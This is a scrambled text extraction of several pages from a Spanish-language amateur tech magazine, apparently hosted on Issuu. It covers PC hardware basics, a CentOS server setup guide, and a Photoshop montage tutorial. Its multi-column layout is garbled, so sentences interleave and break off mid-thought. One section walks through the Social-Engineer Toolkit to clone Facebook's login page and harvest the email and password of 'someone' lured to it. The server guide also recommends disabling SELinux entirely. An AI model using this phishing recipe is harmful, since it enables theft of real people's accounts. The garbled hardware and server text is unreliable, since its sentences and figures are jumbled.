Al abrir dicha unidad central del sistema (también denominado gabinete, chasis o

carcasa se pueden visualizar un conjunto de componentes:

Nos encontramos con componentes como:

CPU o Unidad central de proceso Placa madre o motherboard Memoria principal

Fuente de alimentación Los buses

Disco duro

Unidad central de proceso:

medio del teclado, los que al presionar en

devuelva el resultado serán procesados por el microprocesador y éste nos responderá en el monitor el resultado que lo

La unidad central

el número 4).

los usuarios representa al gabinete o

denominaremos información (es este caso

_ Editores de texto

La presentación de datos seria a si: Las PC

_ Intérpretes

base del sistema de numeraciónb binaria

_ Compiladores

Unidad central del sistema

o computadoras personales trabajan con la (números 0 y 1).

de proceso (CPU) según la mayoría de carcasa de la computadora. CPU en

realidad es el microprocesador el cual

tiene como principal objetivo procesar los datos.

Convengamos que un

microprocesador se puede dividir en dos áreas:

Área de trabajo Área de Control

34

SeNeGe


Son la que determinan la velocidad y la

Sempron 55º 80º

ejecución encargada de dar las órdenes a

Athlon x2 55º 85º

eficiencia del procesador. Las áreas de

las diversas partes del microprocesador se clasifican en:

Unidad Aritmética Lógica y Unidad de punto Flotante

Encargada de realizar todas las operaciones matemáticas y lógicas. Maneja operaciones avanzadas de las matemáticas (tales como

funciones trigonométricas y trascendentales) con mayor precisión. Se encarga de verificar que los datos procesados sean correctos.

La velocidad de mide en MHz, esto representa la cantidad de veces por segundos que el

procesador puede realizar cierto cálculo o proceso. A continuación se presenta una

Celeron D 45º 70º Pentium 4 2Ghz 42º 75º

Intel Core 2 Duo 52º 85º

Factor de formas

Las placas madres se pueden diferenciar según sus características, tamaño, etc. Normalmente se clasifican según su factor de forma (XT, AT, ATX, ATX 2).

Veamos en el gráfico la ubicación de cada componente:

pequeña tabla que ayudará con las unidades de

Ej. Motor de Disqueteras, motor de

Discos Rígidos, motor de CDROM.

Ej. Placa lógica de disco duro, placas de expansión, etc.

como un microprocesador Intel Core 2 duo

3,3V o menos se incorporan debido a

(que permite trabajar con 64bits) pero

que las características de diseño de las

nuestro Sistema Operativo (por ejemplo el

nuevas PC, hacen que sus

Windows XP) es de 32Bits nunca

componentes consuman menos tensión

aprovecharemos dicho procesador ya que

que antes, Ej. (Microprocesador,

el mismo trabaría solo a 32bits.

memorias, placas de video, etc.)

Zócalo del microprocesador

Gabinetes y tipos:

El zócalo o socket es donde insertamos el

microprocesador. Está ubicado en la placa

La carcasa o gabinete de un equipo es el

madre (detallaremos placa madre en las

esqueleto metálico (los hay también de

próximas unidades)

alumnio, plástico, acrílico, etc) que

Fuentes de alimentación Basicamente hablamos de la fuente ..

Que cumple funciones básicas como:

_ Rectificar la corriente alterna a corriente continua.

_ Generar los voltajes de corriente continua Voltajes de la fuente de alimentación:

35

alimentar motores dentro de la PC.

circuitos dentro de la PC.

Si compramos procesadores de 2 núcleos

minima y Temperatura máxima

negro) se utilizan para

negro) se utilizan para alimentar

1 Hz 1 Hz 1 Mhz 1000 Hz 1Ghz 1000 Mhz

Las temperaturas del Procesador ideal

12V (cable amarillo y uno de los de color

5V (cable rojo y uno de los de color

medidas:

Temperatura de los procesadores

Las fuentes de alimentación entregan distintos voltajes a los componentes de la PC.

contiene los diferentes componentes internos de la PC.

Mini Tower (son pequeños y utilizados en espacios reducidos).

Médium Tower (es el más utilizado en la actualidad).

Full Tower (es el más grande, usado normalmente para servidores).

Slim Tower (similar al minitower pero más delgado).


Desktop (gabinete dispuesto en forma

horizontal) tiene como particularidad la posibilidad se apoyar encima de éste el monitor reduciendo espacio.

Funcionamiento del disco duro Los cabezales se desplazan

En la siguiente imagen podemos

visualizar el cable de datos (o bus de

datos) y el cable de alimentación que van conectados al disco duro ATA.

sincronizadamente y se introducen como un peine dentro de los espacios vacíos o

libres entre los discos que están girando.

Es importante aclarar que cuando hablamos del disco duro siempre nos imaginamos un solo disco o plato interno girando.

diferencia de los discos ATA (IDE), los

discos SATA no se configuran, ya que el bus de datos de la placa del disco duro

solo permite una sola unidad por conector. Una de las ventajas es la velocidad si la

Ventilación del gabinete

comparamos con los discos ATA (hasta

El gabinete tiene entre sus funciones crear

133Mb/s) en este caso los discos SATA

una corriente de aire interna para refrigerar

tienen una tasa de transferencia de unos

los distintos componentes internos.

300Mb/s.

Puede haber más de un cooler o ventilador

interno. Además suele haber modelos de

gabinetes donde una de sus tapas laterales contiene un cooler.

La distancia entre cabezal y superficie de

A continuación la imagen:

parte del promedio de un cabello humano.

disco es aproximadamente a una centésima

Tipos de discos duros según tecnología IDE (Integrated Drive Electronics) es una denominación comercial, ya que la

denominación técnica para estos discos

duros es ATA (Conexión AT), deriva del diseño original, el cual era conectar una Medidas actuales de diversos dispositivos de Almacenamiento

combinación de unidad y controlador al bus de una computadora AT.

información sin necesidad de pilas o

Disco Duro 160Gb – 250Gb – 320Gb –

baterías.

500Gb – 750GB – 1000Gb

Es importante a la hora de quitar el

Disquete 1,44 Mb DVD 4,7Gb

dispositivo del puerto USB, previamente La ventaja del

Cinta magnética 40Gb – 80Gb

cable de 80 hilos que al tener hilos a masa

– 32Gb

pueden producir los hilos de tensión.

Pendrive 1Gb – 2Gb – 4Gb – 8Gb – 16Gb Memoria SD y micro SD 1Gb – 2Gb – 4Gb – 8Gb

Blu­ray 25Gb – 50Gb

Es un dispositivo de almacenamiento que

utiliza la memoria flash para almacenar la

Dispositivo Capacidad

CD 700Mb

Pendrive

disminuye las interferencias eléctricas que

desde el Windows realicemos la siguiente tarea:

Nos ubicamos en la barra de tareas

(normalmente está abajo del escritorio de

windows) y desde el ícono que aparece en la esquina inferior derecha de la barra

antes mencionada (al lado de la hora de la PC)

36\


Hacemos doble clic y luego seleccionamos

donde dice Dispositivo de almacenamiento masivo USB y presionamos en el botón llamado Detener.

Periféricos de salida son los que reciben la información de la CPU y la muestran al usuario. Ejemplos: monitor, parlantes, impresoras. Periféricos de entrada/salida son el caso típico de las impresoras multifunción (las mismas tienen la posibilidad de escanear e imprimir) Periféricos de almacenamiento son aquellos encargados de almacenar los datos. Ejemplos: disco duro, cd, dvd, pendrive.

Visualizaremos una ventana en la cuál marcaremos el dispositivo a

desconectar (en este caso un pendrive

marca CORSAIR y luego presionamos en Aceptar.

Una vez respetado estos pasos podemos quitar con seguridad nuestro pendrive.

Tipos de periféricos Periféricos de entrada

_ Periféricos de salida

_ Periféricos de entrada/salida

_ Periféricos de almacenamiento _ Periféricos de comunicació

Periféricos de entrada son los que permiten ingresar datos externos nuestra

computadora. Algunos de estos periféricos son: teclado, micrófono, webcam, escáner, Mouse y otros.

37\

Periféricos de comunicación permiten el vínculo entre computadoras o entre la PC y otros periféricos. Ejemplos: fax/modem, hub, switch, router, placa de red, placa madre.

Monitores

CRT (tubo de rayos catódicos)

Resoluciones aconsejables de los monitore Tamaño de monitor Cantidad de píxeles 14” 640 x 480 15” 800 x 600 17” 1024 x 768 19” 1280 x 1024 20” 1600 x 1280 21”1600x1280

LCD (Display o pantalla de cristal líquido)

Un punto a tener en cuenta a la hora de elegir un monitor es la entrada de datos, hay monitores que traen incorporados el conector VGA y el DVI.Un punto a tener en cuenta a la hora de elegir un monitor es la entrada de datos, hay monitores que traen incorporados el conector VGA y el DVI.Un punto a tener en cuenta a la hora de elegir un monitor es la entrada de datos, hay monitores que traen incorporados el conector VGA y el DV


Obtener contraseña de Iniciamos nuestro backtrack Ahora iniciamos The Social­Engineer Toolkit (SET)…

Luego la opción 3 y enter Luego la opción 2 y enter Despues la opción 2 y enter Nos mandara un pantalla:

Luego la opción 3 y enter Nos dice que la herramienta no se use con fines malintencionados sino de prueba, le damos Y y ENTER

Luego la opción 2 y enter Elegimos la opción 1 y enter

38

arthusu


Ahora se la pasamos a alguien… con un poco de ing. Social Ponemos la url que queremos clonar el sitio en este caso facebook XD! (la url tiene que llevar http :D ) Luego enter y enter y esta escuchando en el puerto 80 los que entren capturando las pass.

El mete su correo y contraseña Por eso hay que fijarse en la url

Ponemos ifconfig para ver nuestra ip ahora cuando

El se logea y nos sale su correo y pass

entremos desde otra pc a esa ip… El se logea y nos sale su correo y pass...

39


LEVANTANDO EL HYPER INTRODUCCION

mencionaron.

# IMPORTANE: en todo momento SI TIENES UNA VERSION

Pero una vez que crece mas tu pagina y pasa de ser a pagina

siempre y cuando en la parte de "REPOS" instales los sitorios

realidad vez la gran necesidad de mejor adquirir un servidor

menor a 6 de CentOS, puedes considerar seguir el manual que vayan para tu version.

En este manual practico aprenderas como instalar un servidor

GNU/Linux basado en la distribucion CentOS, he utilizado la version actual mas nueva (CentOS 6), asumiendo que ya

comun (o blog) a una plataforma de sevicios, es cuando en

debido a las grandes limitaciones de un servico de Hosting.

La alternativa a un Hosting, seria la contratacion de un Servidor Dedicado o Servidor Dedicado Virtual.

tenemos instalado CentOS aprenderas sobre todos los servicios

DEDICADOS

basica de los servicios.

dedicados normales y dedicados virtuales:

que debe contar un servidor, la instalacion y configuracion

Los servidores dedicados se dividen en dos, los servidores

Estas implementaciones son recomendadas 100% para

Un Servidor Dedicado Virtual es basicamente una maquina

que en todo momento pueden servirte tambien para un servidor

fisico real,

servidores dedicados (en la nube), pero debes tomar en cuenta local.

TIPOS DE SERVICIOS

virtual (VirtualBox, VMWare o Xen) que corre en un servidor el unico detalle es que si tu proveedor tiene 10 virtuales corriendo, entonces toda la RAM es compartida entre los 10 virtuales. Y entre otras limitaciones:

HOSTING

­ No puedes crear mas virtuales dentro de tu virtual.

servidores y pretender levantar un sitio web con contenido

­ Si la maquina virtual tiene limitaciones, entonces tu sistema

Generalmente cuando tienes un primer acercamiento a

basico y servicios muy comunes (face connect, blog, comments, etc...) lo mas sencillo es contratar un servidior de Hosting en donde el proveedor de Hosting te proporciona una cantidad limitada o especifica de espacio en disco duro para

­ El ancho de banda es compartido. operativo las hereda.

­ Si tu proveedor tiene una sola tarjeta de red, entonces todos los virtuales pasan por la misma interface.

almacenamiento de datos, acceso a servicios externos necesarios

En un Servidor Dedicado normal, basicamente se te esta

dominio).

todos los servicios como si tuvieses la maquina puesta en tu

como: MySQL, Postfix (servidor de correo) y DNS (para el

En un Servicio de Hosting existen limitaciones muy marcadas

arrendando un equipo de computo fisico completo, gozando de propia casa o negocio.

como:

Las ventajas son muy amplias:

­ Tienes un espacio limitado en disco duro para almacenamiento

­ Puedes instalar cualquier servicio (FTP, Apache, Bind, MySQL,

­ El servicio de Base de Datos MySQL es limitado a cierto

­ Tienes acceso a una consola para manejar tu equipo,

de datos.

numero de bases creadas y peso en consumo total.

Asterisk, Icecast, Virtuales, VNC, SSH, etc..).

­ El servidor Postfix (SMTP) esta limitado a un numero de

Las limitaciones:

­ El ancho de banda es limitado a cierto consumo.

­ Tu te encargas de tu seguridad.

dominio.

­ Tu te encragas de respaldar.

correos de salida diarios.

­ No tienes acceso a un DNS, solo a establecer tu propio ­ Existe una limitacion en la creacion de sub­dominios. ­ El servidro FTP te limita a cierto numero de cuentas. ­ No puedes requerir mas servicios, mas los que ya se

40 ANGEL

­ Tu configuras todo.

­ Debes tener amplios conocimientos. Es recomendable un servidor dedicado cuando tus exigencias y


necesidades sobre pasan a un servicio de hosting comun :D. INTERFACES

Si tenemos una o varios IPs estaticas pero solo contamos con una sola tarjeta de red, lo mas correcto seria configurar hebras de la

misma configuracion donde solo vamos poniendo las demas IPs asociando estas nuevas IPs con un valor de ethX compartido.

shell# cd /etc/sysconfig/network­scripts/ # ip estatica 1 ­­ eth0 shell# cat ifcfg­eth0 DEVICE=eth0 BOOTPROTO=none ONBOOT=yes IPADDR=10.10.10.1 NETMASK=255.255.255.0 GATEWAY=10.10.10.254 TYPE=Ethernet HWADDR=aa:bb:cc:dd:ee:ff # ip estatica 2 ­­ eth0:0 shell# cat ifcfg­eth0:0 DEVICE=eth0:0 BOOTPROTO=none ONBOOT=yes IPADDR=10.10.10.2 NETMASK=255.255.255.0 GATEWAY=10.10.10.254 TYPE=Ethernet HWADDR=aa:bb:cc:dd:ee:ff # ip estatica 3 ­­ eth0:1 shell# cat ifcfg­eth0:1 DEVICE=eth0:1 BOOTPROTO=none ONBOOT=yes IPADDR=10.10.10.3 NETMASK=255.255.255.0 GATEWAY=10.10.10.254 TYPE=Ethernet HWADDR=aa:bb:cc:dd:ee:ff # reiniciar para cargar cambios shell# /etc/init.d/network restart # ver las interfaces shell# ifconfig ­a

SELinux: "Disables"

Damos Ok y hay que reiniciar: shell# reUPDATE CENTOS Ya configurado todo, debemos rehacer update: # importamos llaves de servidores default

shell# rpm ­­import /etc/pki/rpm­gpg/RPM­GPG­KEY­* shell# yum update ­y REPOS

Es bueno tener otros Repositorios habilitados ya que comunmente

los repos por default no tienen muchos mas archivos que suelen ser

necesarios a la hora de quere otras aplicaciones o implementaciones de seguridad en nuestro server: # paquete necesario shell# yum install ­y rpm­libs shell# yum install ­y yum­utils # repos shell# cd /etc/pki/rpm­gpg/ shell# wget http://apt.sw.be/RPM­GPG­KEY.dag.txt shell# rpm ­­import RPM­GPG­KEY.dag.txt shell# wget http://dl.fedoraproject.org/pub/epel/6/i386/epel­release­ 6­5.noarch.rpm shell# rpm ­­import epel­release­6­5.noarch.rpm shell# wget http://rpms.famillecollet.com/RPM­GPG­KEY­remi shell# rpm ­­import RPM­GPG­KEY­remi shell# wget http://ATrpms.net/RPM­GPG­KEY.atrpms shell# rpm ­­import RPM­GPG­KEY.atrpms # editar EPEL y agregar una linea shell# cd /etc/yum.repos.d/ shell# cat epel.repo [epel] ... priority=10 ... # repo RPMForge para Cento5 shell# wget http://apt.sw.be/redhat/el5/en/i386/rpmforge/RPMS/rpmforge­ release*rpm shell# rpm ­Uvh rpmforge­release*rpm # repo ATRpms shellt# wgethttp://dl.atrpms.net/el5­x86_64/atrpms/stable/atrpms­ repo*rpm shell# rpm ­Uvh atrpms­repo*rpm

El SELinux es un firewall integrado en CentOS que mas que ayudar,

# actualizacion shell# yum install ­y yum­priorities shell# yum update ­y

montarnos nuestras propias reglas de firewall y no depende de la

PAQUETES BASE

echo de hacerle PING al server, nos bannea el IP y no podemos

se requiere en todoas partes y por cualquier software independiente,

DESHABILITAR SELINUX

siempre ya un monton de problemas, lo mas recomendable es

automatizacion, ya que SELinux es tan delicado, que por el simple conectarnos de ninguna forma. # deshabilitando selinus

shell# system­config­securitylevel­tui Security Level: ( ) Enables (*) Disables

41

Todo sistema GNU/Linux siempre usa un conjunto de paquetes que te recomiendo instales estos paquetes como base (los primer que instales en tu server):

shell# yum install ­y fetchmail wget bzip2 unzip zip nmap openssl lynx fileutils gcc gcc­c++

continuara...


FOTOMONTAJE Hola compañeros les vengo a dejar este gran tutorial de como crear un fotomontaje usando 2 animales distintos y obteniendo un gran resultado espero y aprendan bueno empezamos. Primero que nada abrimos las 2 imágenes como se muestra en la siguiente imagen Yo utilizare Estas 2 imágenes

enter

Para validar la selección nos debe de

quedar algo así..

Ya seleccionada la cabeza

del águila la arrastramos a la siguiente imagen “pescado”

y le damos Ctrl+t

y seleccionamos voltiar horizontalmente

Ya abierta la primera imagen utilizaremos

Ie acomodamos la cabeza del aguila como en la siguiente

la herramienta de lazo magnético Ie seleccionamos toda la cabeza del águila

detalladamente ya teniendo eso listo damos

42

m3x1c0h4ck


imagen.

pasamos encima del águila nos

la herramienta borrador

La primera capa le damos en

Le bajamos la opacidad i con borramos esas partes que

quedaría así,

crear mascara de recorte

sobran para dejarla igual que

presionando ctrl+alt+g

Ahora ocultamos la capa del

i nos quedaría asi.

la cabeza del pez. Algo así águila i hacemos una

I la poner en modo oscurecer

selección con la herramienta

Ahora para finalizar damos ctrl+t i en deformar i la

deformamos i nos quedaría asi lazo magnético.

Luego de eso duplicamos esa capa presionando ctrl+j I la capa duplicada la

43

Este es el resultado final


Turn static files into dynamic content formats.

Create a flipbook
Issuu converts static files into: digital portfolios, online yearbooks, online catalogs, digital photo albums and more. Sign up and create your flipbook.